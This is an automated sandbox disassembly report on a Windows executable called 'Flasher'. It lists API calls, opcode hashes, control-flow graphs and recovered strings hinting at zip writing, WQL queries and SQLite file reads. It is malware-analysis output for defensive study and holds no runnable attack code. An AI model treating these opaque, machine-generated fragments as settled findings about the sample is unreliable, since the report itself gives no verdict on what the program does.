                                                                      • Opcode ID: 332866d784f26a8bd4739552e81f22e459a73746ba1fe5aa6a99357519aa9673
                                                                      • Instruction ID: 887bad16ebaf1b02f3fc0dbd6e2c534a02f76df10b079b37df8b774cd359a265
                                                                      • Opcode Fuzzy Hash: 332866d784f26a8bd4739552e81f22e459a73746ba1fe5aa6a99357519aa9673
                                                                      • Instruction Fuzzy Hash: 3601BB25E5984295FB44E721DC530FDA3A2BF95744F844473D00EE32A5DE2CA97AD704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcmpmemset
                                                                      • String ID:
                                                                      • API String ID: 1065087418-0
                                                                      • Opcode ID: ece57d0d4e5d6dd7a11fd600a2a3f8832692d799e2c88e18a08e7fbef6034c89
                                                                      • Instruction ID: d7fc684da95b0208b865a4eab664bfc07bac04e40a355ed062b05ca56f3d5dca
                                                                      • Opcode Fuzzy Hash: ece57d0d4e5d6dd7a11fd600a2a3f8832692d799e2c88e18a08e7fbef6034c89
                                                                      • Instruction Fuzzy Hash: E2B1B062A08AC285FB608B36845227DA7E5FF85B88F184433CF0DE7799DEBCD5619300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CryptRandom
                                                                      • String ID:
                                                                      • API String ID: 2662593985-0
                                                                      • Opcode ID: c1fa4997b17101d465341b0a31e5a12c182a4889957f8806b8244bce7d5eb717
                                                                      • Instruction ID: bbef3bce27caa540acb912704523d69600bbbf59a1daf956ca2403bc26d46169
                                                                      • Opcode Fuzzy Hash: c1fa4997b17101d465341b0a31e5a12c182a4889957f8806b8244bce7d5eb717
                                                                      • Instruction Fuzzy Hash: EC0144A2B1559511FE555B366806778C5816B88FB0F298236DE3CEB7C2CC3CC8928304
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000002,?,00007FF6D3512752), ref: 00007FF6D35123FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      • Opcode ID: de6f84b4a938d7710ec262f4d6c3fe2d42db37168e94fa1611a6bf03796e0230
                                                                      • Instruction ID: be7d5f700ce3af267476f542c7e1d595ffcfb87075dd46d94e4cd102332ad3cd
                                                                      • Opcode Fuzzy Hash: de6f84b4a938d7710ec262f4d6c3fe2d42db37168e94fa1611a6bf03796e0230
                                                                      • Instruction Fuzzy Hash: F3012C72619B8586D360CF69F84165EB6E5F784790F248135EBCE83B18DF38D0A1CB00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17aa550a2d9927a78b204b78b5e693a5fe0ebc35caadd3715463ef82fa4b9720
                                                                      • Instruction ID: 81b10d436942eafb15053cecf378ff1a55e47dd5cc05c69038128ec88fe80e30
                                                                      • Opcode Fuzzy Hash: 17aa550a2d9927a78b204b78b5e693a5fe0ebc35caadd3715463ef82fa4b9720
                                                                      • Instruction Fuzzy Hash: A5A1F462E09BC281FA659B66944337EE791BF84B95F540132DD0EA7B85DF3CE861A300

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17378 7ff6d35db520-7ff6d35db58d 17379 7ff6d35db58f 17378->17379 17380 7ff6d35db5c0-7ff6d35db5c9 17378->17380 17381 7ff6d35db5af-7ff6d35db5bc 17379->17381 17382 7ff6d35db5fe-7ff6d35db623 17380->17382 17383 7ff6d35db5cb-7ff6d35db5f7 call 7ff6d3738330 17380->17383 17384 7ff6d35db626-7ff6d35db642 SetLastError GetTempPathW 17381->17384 17382->17384 17383->17382 17387 7ff6d35db644-7ff6d35db64b GetLastError 17384->17387 17388 7ff6d35db651-7ff6d35db657 17384->17388 17387->17388 17391 7ff6d35db732-7ff6d35db745 GetLastError 17387->17391 17389 7ff6d35db5a0 17388->17389 17390 7ff6d35db65d-7ff6d35db665 GetLastError 17388->17390 17394 7ff6d35db68f-7ff6d35db692 17389->17394 17395 7ff6d35db5a6-7ff6d35db5ad 17389->17395 17392 7ff6d35db66b-7ff6d35db684 17390->17392 17393 7ff6d35db718-7ff6d35db730 call 7ff6d3734750 17390->17393 17396 7ff6d35db75d 17391->17396 17397 7ff6d35db747-7ff6d35db757 HeapFree 17391->17397 17392->17381 17399 7ff6d35db68a 17392->17399 17408 7ff6d35db7a4-7ff6d35db7d4 17393->17408 17400 7ff6d35db78f-7ff6d35db79f call 7ff6d37346e0 17394->17400 17401 7ff6d35db698-7ff6d35db6cb call 7ff6d35d80a0 17394->17401 17395->17380 17395->17381 17398 7ff6d35db761-7ff6d35db78d call 7ff6d3734a10 17396->17398 17397->17396 17398->17408 17399->17380 17400->17408 17412 7ff6d35db6e3-7ff6d35db6e9 17401->17412 17413 7ff6d35db6cd-7ff6d35db6dd HeapFree 17401->17413 17410 7ff6d35db7ec-7ff6d35db7fd 17408->17410 17411 7ff6d35db7d6-7ff6d35db7e6 HeapFree 17408->17411 17411->17410 17412->17398 17414 7ff6d35db6eb-7ff6d35db717 17412->17414 17413->17412
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$FreeHeap$PathTemp
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 3689437125-2333694755
                                                                      • Opcode ID: 3f11da1fdb2686e584a360b847a51340d17f67275d6db508c466cf4820c4047d
                                                                      • Instruction ID: 8a5acd0f3ad60158dd68126e37260061cd60852769158910a322d97878811ccb
                                                                      • Opcode Fuzzy Hash: 3f11da1fdb2686e584a360b847a51340d17f67275d6db508c466cf4820c4047d
                                                                      • Instruction Fuzzy Hash: EF61D262A04BCA85EB619F21E8067EDA365BB847A8F444136DE2CA7784DF7CD295C304

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17482 7ff6d35ef470-7ff6d35ef493 17483 7ff6d35ef495-7ff6d35ef4a0 CancelIo 17482->17483 17484 7ff6d35ef4df-7ff6d35ef4e3 17482->17484 17486 7ff6d35ef4e5 GetLastError 17483->17486 17487 7ff6d35ef4a2-7ff6d35ef4c5 GetOverlappedResult 17483->17487 17485 7ff6d35ef535-7ff6d35ef55f CloseHandle * 2 HeapFree 17484->17485 17489 7ff6d35ef566-7ff6d35ef570 GetLastError 17485->17489 17488 7ff6d35ef4ea-7ff6d35ef522 call 7ff6d35efed0 17486->17488 17487->17489 17490 7ff6d35ef4cb 17487->17490 17496 7ff6d35ef584-7ff6d35ef5ca call 7ff6d373420a 17488->17496 17497 7ff6d35ef524-7ff6d35ef531 17488->17497 17492 7ff6d35ef4ce-7ff6d35ef4dd 17489->17492 17493 7ff6d35ef576-7ff6d35ef579 17489->17493 17490->17492 17492->17485 17493->17492 17495 7ff6d35ef57f 17493->17495 17495->17488 17500 7ff6d35ef5cc-7ff6d35ef5e7 HeapFree 17496->17500 17501 7ff6d35ef5eb-7ff6d35ef622 CloseHandle * 2 HeapFree 17496->17501 17497->17485 17500->17501
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$ErrorFreeHeapLast$CancelOverlappedResult
                                                                      • String ID:
                                                                      • API String ID: 3987361021-0
                                                                      • Opcode ID: 91bcc67dcc225b22216f181e12c840d2cb27a05f7591a38834909435660ac60a
                                                                      • Instruction ID: 9fa868affa9b9310f5193344dfb0569517b03febf18ee67c99081ccb5cad57c5
                                                                      • Opcode Fuzzy Hash: 91bcc67dcc225b22216f181e12c840d2cb27a05f7591a38834909435660ac60a
                                                                      • Instruction Fuzzy Hash: 58414B27A05F5585E7559F62E8023AC67A0FB98B98F464533DE1CB7798CF38E4A2C340

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17773 7ff6d34f81a5-7ff6d34f81d0 17774 7ff6d34f85d5-7ff6d34f85dc call 7ff6d3734950 17773->17774 17775 7ff6d34f81d6-7ff6d34f81e8 17773->17775 17779 7ff6d34f85e1-7ff6d34f860e call 7ff6d3734a10 17774->17779 17777 7ff6d34f81ea-7ff6d34f81f4 memset 17775->17777 17778 7ff6d34f81f9-7ff6d34f8230 17775->17778 17777->17778 17780 7ff6d34f8232-7ff6d34f8239 17778->17780 17781 7ff6d34f829f-7ff6d34f82a6 17778->17781 17789 7ff6d34f8613-7ff6d34f8626 call 7ff6d37372c2 17779->17789 17784 7ff6d34f823b-7ff6d34f8242 17780->17784 17785 7ff6d34f82a8-7ff6d34f82af 17780->17785 17782 7ff6d34f82be-7ff6d34f82cc 17781->17782 17787 7ff6d34f8484-7ff6d34f848c 17782->17787 17788 7ff6d34f82d2-7ff6d34f82e6 17782->17788 17790 7ff6d34f8249-7ff6d34f8266 17784->17790 17786 7ff6d34f82b6-7ff6d34f82ba 17785->17786 17786->17782 17791 7ff6d34f848e-7ff6d34f8492 call 7ff6d35650c5 17787->17791 17792 7ff6d34f8497-7ff6d34f84a1 17787->17792 17793 7ff6d34f8592-7ff6d34f859a call 7ff6d3738410 17788->17793 17794 7ff6d34f82ec-7ff6d34f82f9 17788->17794 17806 7ff6d34f862b-7ff6d34f8672 call 7ff6d37346b0 17789->17806 17796 7ff6d34f8270-7ff6d34f8290 call 7ff6d34f900e HeapFree 17790->17796 17797 7ff6d34f8268-7ff6d34f826b call 7ff6d35c52fb 17790->17797 17791->17792 17801 7ff6d34f84a3-7ff6d34f84aa 17792->17801 17802 7ff6d34f851c-7ff6d34f8526 17792->17802 17804 7ff6d34f859f-7ff6d34f85a6 call 7ff6d37384d0 17793->17804 17794->17804 17805 7ff6d34f82ff-7ff6d34f8308 17794->17805 17796->17790 17817 7ff6d34f8292-7ff6d34f829d 17796->17817 17797->17796 17810 7ff6d34f8503-7ff6d34f8515 HeapFree 17801->17810 17811 7ff6d34f84ac-7ff6d34f84b3 17801->17811 17807 7ff6d34f8528 17802->17807 17808 7ff6d34f8546-7ff6d34f854d 17802->17808 17830 7ff6d34f85af-7ff6d34f85ca call 7ff6d37372df 17804->17830 17805->17779 17813 7ff6d34f830e-7ff6d34f8314 17805->17813 17822 7ff6d34f8677-7ff6d34f8717 call 7ff6d37346b0 call 7ff6d35d6320 17806->17822 17816 7ff6d34f852f-7ff6d34f8544 HeapFree 17807->17816 17818 7ff6d34f8571-7ff6d34f8591 call 7ff6d35bfc7d 17808->17818 17819 7ff6d34f854f-7ff6d34f856b HeapFree 17808->17819 17810->17802 17820 7ff6d34f84ba-7ff6d34f84d7 17811->17820 17813->17789 17821 7ff6d34f831a-7ff6d34f831f 17813->17821 17816->17808 17816->17816 17817->17786 17819->17818 17825 7ff6d34f84e1-7ff6d34f8501 call 7ff6d34f900e HeapFree 17820->17825 17826 7ff6d34f84d9-7ff6d34f84dc call 7ff6d35c52fb 17820->17826 17827 7ff6d34f8325-7ff6d34f8328 call 7ff6d3678088 17821->17827 17828 7ff6d34f8472-7ff6d34f847f call 7ff6d35c598d 17821->17828 17825->17810 17825->17820 17826->17825 17837 7ff6d34f832d-7ff6d34f8339 17827->17837 17828->17787 17841 7ff6d34f833f-7ff6d34f834a 17830->17841 17845 7ff6d34f85d0 17830->17845 17837->17830 17837->17841 17844 7ff6d34f834d-7ff6d34f8386 call 7ff6d35c598d 17841->17844 17844->17787 17848 7ff6d34f838c-7ff6d34f83cc 17844->17848 17845->17844 17848->17806 17849 7ff6d34f83d2-7ff6d34f83d9 call 7ff6d37384d0 17848->17849 17849->17806 17852 7ff6d34f83df-7ff6d34f8442 call 7ff6d35e0db0 17849->17852 17855 7ff6d34f8464-7ff6d34f8470 call 7ff6d34f89bf 17852->17855 17856 7ff6d34f8444-7ff6d34f845e call 7ff6d35e0300 17852->17856 17855->17787 17856->17822 17856->17855
                                                                      APIs
                                                                      • memset.VCRUNTIME140 ref: 00007FF6D34F81F4
                                                                        • Part of subcall function 00007FF6D35E0DB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0ED3
                                                                        • Part of subcall function 00007FF6D35E0DB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0EE6
                                                                        • Part of subcall function 00007FF6D35E0DB0: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0F11
                                                                      • HeapFree.KERNEL32 ref: 00007FF6D34F8288
                                                                      • HeapFree.KERNEL32 ref: 00007FF6D34F84F9
                                                                      • HeapFree.KERNEL32 ref: 00007FF6D34F850F
                                                                      • HeapFree.KERNEL32 ref: 00007FF6D34F853C
                                                                      • HeapFree.KERNEL32 ref: 00007FF6D34F856B
                                                                        • Part of subcall function 00007FF6D35E0300: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E0476
                                                                        • Part of subcall function 00007FF6D35E0300: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E048B
                                                                        • Part of subcall function 00007FF6D35E0300: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E04B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$AddressSingleWake$memset
                                                                      • String ID: called `Result::unwrap()` on an `Err` value$stderrstd\src\io\mod.rs
                                                                      • API String ID: 378572198-1160352639
                                                                      • Opcode ID: a66bfd9075c6ef6ddfe183db1350a9875603c0c362419289e68a77286061ed54
                                                                      • Instruction ID: b4a8f2d1f780777a0a595176b65e0ca7c99d77405c81c4cd340327b36eef4026
                                                                      • Opcode Fuzzy Hash: a66bfd9075c6ef6ddfe183db1350a9875603c0c362419289e68a77286061ed54
                                                                      • Instruction Fuzzy Hash: DFE17022A05F8595EBA09F25D8427ED73A4FB44768F454233CA6CA77A5DF3CD1AAC300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove$FileFindNextmemset
                                                                      • String ID:
                                                                      • API String ID: 1082990326-0
                                                                      • Opcode ID: b455f6b7be85c190a1d2ac7295576988526734a853b632a909f1810740c2268e
                                                                      • Instruction ID: 1cd284d97ad7c020a8260dd1f7a49dc78e3039d9a6fc6faf758da0e180a75516
                                                                      • Opcode Fuzzy Hash: b455f6b7be85c190a1d2ac7295576988526734a853b632a909f1810740c2268e
                                                                      • Instruction Fuzzy Hash: 82617CB6A05AC6C9E7718F25D8423EDA3B0FF54758F045122DF589BA95EF38E2A1C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$Free$Alloc$Heap
                                                                      • String ID: 0$WQLC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.6.4\src\write.rs
                                                                      • API String ID: 3607330857-484539666
                                                                      • Opcode ID: 79193393cd9aae9933c581c69d8195d2a4fdda6eda3463619af06ff4fbb7f50c
                                                                      • Instruction ID: c151e60f96f36dbb456111cebfc29b609deb787bb367a4a6e7f0f51dde00ca28
                                                                      • Opcode Fuzzy Hash: 79193393cd9aae9933c581c69d8195d2a4fdda6eda3463619af06ff4fbb7f50c
                                                                      • Instruction Fuzzy Hash: 8F717F22A0DBC182E6618F16E4013AEE760FB95B84F089126DFCDA3B56DF3CE194D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$CopyErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 492081815-0
                                                                      • Opcode ID: 5c5abf95b1143d884ae228046510e9cc11e93cc7f9153528bd6642c1e4f37c46
                                                                      • Instruction ID: e45522c7c5dfbcec919de8f32fd54d08ba9fe63f061c956881667b8d5297ae33
                                                                      • Opcode Fuzzy Hash: 5c5abf95b1143d884ae228046510e9cc11e93cc7f9153528bd6642c1e4f37c46
                                                                      • Instruction Fuzzy Hash: FE417F66F05B4688FB40DBA2D8423BDA761BB88BD8F048536CE1DA7B9CDF38D1558340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                                                      • String ID: main
                                                                      • API String ID: 3663057573-3207122276
                                                                      • Opcode ID: 056f1647f953d65845aad4485b219aeae60734370efb12bde1be905411e62aaf
                                                                      • Instruction ID: 4a38d11401f549ead01c649a54f9f9b24ac88075372b27c9148c8ecd91a843d8
                                                                      • Opcode Fuzzy Hash: 056f1647f953d65845aad4485b219aeae60734370efb12bde1be905411e62aaf
                                                                      • Instruction Fuzzy Hash: 3F614E36A05F4685EB50DB64E8823ACB7B0FB48764F548236C95CA77A4DF3CE5A9C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: database schema is locked: %s$out of memory$statement too long
                                                                      • API String ID: 2221118986-1046679716
                                                                      • Opcode ID: 701757e88d7c0464e72d7e199289ecb80534d62b42c4d8c1637d4b905bea5959
                                                                      • Instruction ID: b73d94bf0dd32d30a5545c06e109e96844a6b2937eab2b9f3a5d0c3016b99ea0
                                                                      • Opcode Fuzzy Hash: 701757e88d7c0464e72d7e199289ecb80534d62b42c4d8c1637d4b905bea5959
                                                                      • Instruction Fuzzy Hash: 60B1C422A0DB8286E725CB62D5826BEE7B0FB49794F044036DB4DA7B85DF3DE465C304
                                                                      APIs
                                                                        • Part of subcall function 00007FF6D36F5538: memmove.VCRUNTIME140(?,?,?,?,00007FF6D36824D7,?,?,?,00000000,00000035,?,00000000,00007FF6D36D1D27), ref: 00007FF6D36F554A
                                                                      • memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C133E
                                                                      • memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C1386
                                                                      • memcmp.VCRUNTIME140(?,00000000,00000001,00007FF6D36D81CC,?,00000000,00000000,00007FF6D36D1E5F,00000000,00000000,00000080,00007FF6D3700310), ref: 00007FF6D36C13FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcmp$memmove
                                                                      • String ID: @ $SQLite format 3
                                                                      • API String ID: 848149194-3708268960
                                                                      • Opcode ID: 8db51b3f6df84be0cc2006d3c1c03a6e51dddac8e6561db4a1fff68fe99ef894
                                                                      • Instruction ID: 227e5920f07906c098f1370f854e716e9ef6d1027079ed900615ad9aa2c19eaa
                                                                      • Opcode Fuzzy Hash: 8db51b3f6df84be0cc2006d3c1c03a6e51dddac8e6561db4a1fff68fe99ef894
                                                                      • Instruction Fuzzy Hash: C9711863B0829246FB10DF26D4422BDABA5EF84B98F094036DE0DE7786DE3CD865D750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
